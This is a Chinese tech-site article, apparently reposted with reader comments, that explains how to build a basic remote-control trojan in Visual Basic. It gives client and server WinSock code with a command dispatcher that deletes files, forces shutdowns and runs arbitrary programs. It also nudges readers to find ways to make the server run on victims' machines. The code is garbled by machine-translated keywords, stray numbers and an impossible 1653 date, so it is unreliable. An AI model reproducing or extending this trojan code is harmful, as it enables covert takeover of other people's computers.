
看看这个2113是用VB编译的木马程序
1. “5261马”被称为BO,这是由黑客组织于1653年在美国举办的黑客4102技术研讨会上推广的. 它实际上是一个客户机/服务器程序,其使用原理是直接在计算机上启动的程序具有与用户相同的权限. 因此,如果可以在服务器端(即被攻击的计算机)启动服务器程序,则可以使用相应的客户端工具客户端程序直接控制它. 让我们讨论一下如何使用VB来实现它.
使用VB创建两个程序,一个是客户端程序Client,另一个是服务器程序systry.
在Client项目中创建一个窗体,加载名为tcpClient的WinSock控件,选择TCP作为协议,并添加两个文本框以输入服务器的IP地址或服务器名称,然后创建一个按钮,按下即可初始化连接,代码如下:
私人Sub cmdConnect_Click()
如果Len(Text1.Text)= 0并且Len(Text2.Text)= 0那么
MsgBox(“请输入主机名或主机IP地址. ”)
退出子
其他
如果Len(Text1.Text)> 0然后
tcpClient.RemoteHost =文本1.文本
其他
tcpClient.RemoteHost = Text2.Text
如果结束
如果结束
tcpClient.Connect

Timer1.Enabled =真
结束子
建立连接后,可以使用DataArrival事件处理接收到的数据.
建立连接后,可以使用DataArrival事件处理接收到的数据.
在服务器端systry项目中创建一个表单,加载名为tcpServer的WinSock控件,选择TCP作为协议,然后将以下代码添加到Form_Load事件中:
私人子Form_Load()
tcpServer.LocalPort = 1999
tcpServer.Listen
结束子
准备回答客户端程序的请求连接,并使用ConnectionRequest事件回答客户端程序的请求. 代码如下:
私有Sub tcpServer_ConnectionRequest
(ByVal requestID为Long)
如果tcpServer.State sckClosed然后
tcpServer.Close‘检查控件的State属性是否关闭.
结束如果是‘否,请先关闭此连接,然后再接受新连接.
tcpServer.Accept requestID

结束子
以这种方式,在客户端程序按下连接按钮之后,将触发服务器程序的ConnectionRequest事件,并执行上述代码. 如果没有任何反应,则建立连接.
2. 建立连接后,服务器端程序会通过DataArrival事件接收客户端程序发出的指令,以运行已建立的程序. 例如: 将服务器端驱动器名称,目录名,文件名等传输到客户端,然后在客户端接收到它之后,使用TreeView控件以树状形式显示它,浏览服务器-辅助文件目录;强制关闭或重新启动服务器端计算机;屏蔽任务栏窗口;屏蔽开始菜单;根据客户端传递的文件名或目录名将其删除;屏蔽热启动按钮;在服务器上运行任何程序;还包括获取目标计算机的屏幕图像,窗口和进程列表;激活和终止远程进程;打开,关闭和移动远程窗口;控制目标计算机鼠标的移动和动作;交换远程鼠标的左右按钮;在目标计算机上模拟键盘输入,下载和上传文件;提取,创建和修改目标计算机系统的注册表项;在远程屏幕上显示一条消息. DataArrival事件过程如下:
私有子tcpServer_DataArrival
(ByVal bytesTotal as Long)
将strData设置为字符串
我只要很久
将mKey设置为字符串
tcpServer.GetData strData
‘接收数据并将其存储在strData中
对于i = 1到Len(strData)
‘strData中的单独命令
如果Mid(strData,i,1)=“ @”那么
mKey = Left(strData,i-1)
‘在mKey中保存命令ID号
‘将命令参数保存到strData

strData =右(strData,Len(strData)-i)
退出
如果结束
下一个我
选择大小写Val(mKey)
案例1
‘驱动器名称,目录名称,文件名
案例2
强行关闭服务器端的计算机
案例3
强制重新启动服务器计算机
案例4
阻止任务栏窗口;
案例5
阻止开始菜单;
案例6

根据客户端传递的文件名或目录名,将其删除;
案例7
屏蔽热启动键;
案例8
在服务器端运行任何程序
结束选择
结束子
省略详细步骤.
客户端使用tcpClient.SendData发送命令. 该命令包括命令ID和命令参数,用符号“ @”分隔.
此外,当客户端与服务器断开连接时,服务器端将使用tcpServer_Close事件继续准备接收客户端请求. 代码如下:
私有Sub tcpServer_Close()
tcpServer.Close
tcpServer.Listen
结束子
这是最基本的木马程序. 只要您的计算机运行服务器端程序,其他计算机就可以控制您几千英里之外的计算机. 至于如何使服务器端程序运行,您必须发挥自己的独创性. 我的源程序中有一个方法可以修改系统注册表.
这是最基本的木马程序. 只要您的计算机运行服务器端程序,其他计算机就可以控制您几千英里之外的计算机. 至于如何使服务器端程序运行,您必须发挥自己的独创性. 我的源程序中有一个方法可以修改系统注册表.
成功的木马程序要比这复杂得多,并且必须解决程序隐藏,自动复制和传播之类的问题. 警告: 切勿使用BO程序来破坏他人的系统.
本文来自电脑杂谈,转载请注明本文网址:
http://www.pc-fly.com/a/shouji/article-289771-1.html
乱放屁
改变不了了
以战止战吧